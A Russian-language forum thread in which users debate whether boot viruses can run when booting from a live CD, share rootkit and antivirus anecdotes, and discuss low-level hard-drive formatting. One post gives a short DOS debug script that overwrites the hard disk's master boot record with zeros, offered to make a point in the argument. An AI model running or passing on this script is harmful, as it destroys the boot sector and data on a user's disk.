Перейти к содержимому
Калькуляторы

что за трипер подмена ДНС

Ответить

Дегтярев Илья   

Дегтярев Илья
Опубликовано · Жалоба

Еще раз, при инициализации винта никакой код не выполняется! Выполняется код из биоса рейд контроллера. Если загрузка с cd-rom началась, никакого кода, который может быть выполнен в памяти нет! (точнее если он до этого и загрузился, никто ему управление не передаст). Убить винт испортив прошивку контроллера винта очевидно можно. Но заставить что то исполнить CPUом нельзя, пока не стоит загрузка с зараженного винта.

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

itl2044   

itl2044
Опубликовано · Жалоба 

debug
-F 9000:0 L 200 0
-A
MOV DX,9000
MOV ES,DX
XOR BX,BX
MOV CX,0001
MOV DX,0080
MOV AX,0301
INT 13
INT 20
ENTER, ENTER
-G

Чтобы выполнить этот код - достаточно просто обратится к винту, "дырок" для запуска процедуры - вагон и маленькая тележка.

Последствия выполнения данного кода - даже не хочу описывать.

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

IvanI   

IvanI
Опубликовано · Жалоба
2. Исходя из пункта 1 - винт нужно втыкать "на горячую", уже после инициализации ядра ОС и антивируса.
Чтобы выполнить этот код - достаточно просто обратится к винту, "дырок" для запуска процедуры - вагон и маленькая тележка.

Последствия выполнения данного кода - даже не хочу описывать.

"рация на бронепоезде"....

 

Руткит который я руками выковырял у клиента в базе каспера появился через 3!! недели...

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

Солнечный КОТ   

Солнечный КОТ
Опубликовано · Жалоба

Надеюсь руки потом помыли?

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

-Px-   

-Px-
Опубликовано · Жалоба
"рация на бронепоезде"....
Ну не понимает человек разницы между кодом и данными, что тут сделать :)
Руткит который я руками выковырял у клиента в базе каспера появился через 3!! недели...
Надо было им слать, появился бы раньше ;)

PS: полное описание упомянутого буткита, в котором явно видно что вирус не активируется при загрузке с live-cd

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

IvanI   

IvanI
Опубликовано · Жалоба
Надо было им слать, появился бы раньше ;)
Как слать?

У них тока почта для приема вирей, просто на сайте залить файл нельзя и им это пофигу(писал - пришла отписка).

 

то Солнечный КОТ

Не все любят постоянный секс с операционкой, некотрые покупают винду и работают.

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

vIv   

vIv
Опубликовано · Жалоба

Кстати, а кто когда последний раз видел HDD, на которых без стенда можно сделать low level format, пусть даже подцепившись к инженерному разъёму? Я уже лет десять таких не видел...

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

-Px-   

-Px-
Опубликовано · Жалоба
Надо было им слать, появился бы раньше ;)
Как слать?

У них тока почта для приема вирей

На почту и слать, в запароленном архиве

Время реакции от часа до недели, но неотвеченных запросов пока не было :)

 

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

IvanI   

IvanI
Опубликовано · Жалоба
Кстати, а кто когда последний раз видел HDD, на которых без стенда можно сделать low level format, пусть даже подцепившись к инженерному разъёму? Я уже лет десять таких не видел...

Формат поверхности уже давно делается на спечальном стенде с лазеным позиционированием, мы можем тока переназначать (прятать бЕды), писать и читать сектора.

 

 

Надо было им слать, появился бы раньше ;)
Как слать?

У них тока почта для приема вирей

На почту и слать, в запароленном архиве

Время реакции от часа до недели, но неотвеченных запросов пока не было :)

Особенно приятно это делать с зараженного неизвестным вирем компа...

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

martin74   

martin74
Опубликовано · Жалоба

покажите вирус, работающий при загрузке с livecd. Имеется в виду - находящийся на зараженной машине.

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

vIv   

vIv
Опубликовано · Жалоба
Кстати, а кто когда последний раз видел HDD, на которых без стенда можно сделать low level format, пусть даже подцепившись к инженерному разъёму? Я уже лет десять таких не видел...

Формат поверхности уже давно делается на спечальном стенде с лазеным позиционированием, мы можем тока переназначать (прятать бЕды), писать и читать сектора.

Собственно и я о том же...

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

-Px-   

-Px-
Опубликовано · Жалоба

Особенно приятно это делать с зараженного неизвестным вирем компа...

Что-то мешает запаковать с паролем на зараженной, и отослать с другого? :)

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

itl2044   

itl2044
Опубликовано · Жалоба
Кстати, а кто когда последний раз видел HDD, на которых без стенда можно сделать low level format, пусть даже подцепившись к инженерному разъёму? Я уже лет десять таких не видел...

Формат поверхности уже давно делается на спечальном стенде с лазеным позиционированием, мы можем тока переназначать (прятать бЕды), писать и читать сектора.

Собственно и я о том же...

Виктория начиная с версии 1,07 форматирует ловлевел......

Огромные деньги за раскрытие сией огромной тайны - переводите ко мне на счет! (и побольше, побольше!).

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

vIv   

vIv
Опубликовано · Жалоба

Ссылку, сестра! Что это за волшебный софт (это софт?), который программно эмулирует механику?

 

http://hdd-911.com/index.php?option=com_do...mp;ascdesc=DESC - это?

Если да, то форматировать-то она, возможно, и форматирует... если в винчестере это доступно. Только давно уже вместо форматирования стоят заглушки. А имеющиеся в банке головки просто не умеют так форматировать, так-как имеют автонаведение на трек по сервоинформации, нанесённой стендом. Посмотри на банку, видишь с торца отверстие, заклеенное наклеечкой? Вот через неё и делается низкоуровневое форматирование на современных винчестерах.

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

IvanI   

IvanI
Опубликовано · Жалоба

Самое "низкоуровневое" что у меня есть - это PC3000 которая умела 5 лет назад на старых винтах (давно таким сексом незанимаюсь) перераспределять сектора, писать микропрограмму в винт,писать спец таблици в винт и отключать поверхности - форматирование давно логическая операция.

 

Из современного экстримального есть мааленькая прога (16 865 байт), которая умеет читать и ПИСАТЬ под виндами ЛЮБЫЕ (в том числе и с которого винда работает) диски и партиции незамечая никаких защит винды и неконфликтуя с антивирем - если неправельно выбрал винт который надо потереть то увидиш через 3-5 мин синий экран предшествующий перестановке винды. Видя постоянно на рабочем столе это чудо понимаеш, что вирь может тоже и еще больше...

 

C LiveCD почтой с генеренным паролем в 10 символов както проблематично пользоваться...

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

vIv   

vIv
Опубликовано · Жалоба

Я бы не назвал процедуру вводе в гермоблок внешнего блока головок "логической операцией". Или ты про заглушки на месте родных АТА команд?

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 смайлов.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
Подписчики 0
Перейти к списку тем У нага